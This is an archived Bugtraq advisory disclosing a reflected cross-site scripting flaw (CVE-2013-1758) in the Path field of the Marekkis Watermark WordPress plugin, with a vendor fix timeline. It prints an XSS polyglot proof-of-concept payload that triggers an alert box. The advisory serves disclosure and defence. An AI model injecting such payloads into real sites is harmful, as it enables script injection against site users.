Bugtraq mailing list archives
Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability
From: nauty.me04 () gmail com
Date: Mon, 18 Feb 2013 17:20:12 GMT
############################# Exploit Title : Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability Author: Aditya Balapure home: http://adityabalapure.blogspot.in/ Date: 18/02/13 software link: http://wordpress.org/extend/plugins/marekkis-watermark/ CVE Assigned - CVE-2013-1758 ############################# Marekkis Watermark-Plugin description Marekkis Watermark-Plugin for WordPress can watermark your pictures an two different ways: Insert your watermark while the picture is being uploaded. After the activation every picture that you will upload with wordpress build-in media-uploader will be watermarked. In the configuration-screen you can set up the position and the type of your watermark. It can be your logo (.png-file) with transparent background or a free text with color, font, size, shadow and transparency-level of your choice. See screenshots. Insert your watermark on all chosen pictures from a directory on your web-server. Marekkis Watermark makes possible to create a watermark on mediafiles that are already uploaded on your server. So you can mark all your old pictures with the new watermark. ########################## XSS location The Marekkis Watermark-Plugin in Wordpress http://wordpress.org/extend/plugins/marekkis-watermark/ has a Reflected XSS Vulnerability in the Path input box. Script Used- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
########################## Vendor Notification 05/02/2013 to: - Vendor notified awaiting action 17/02/2013 - Fixed and closed
Current thread:
- Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability nauty . me04 (Feb 18)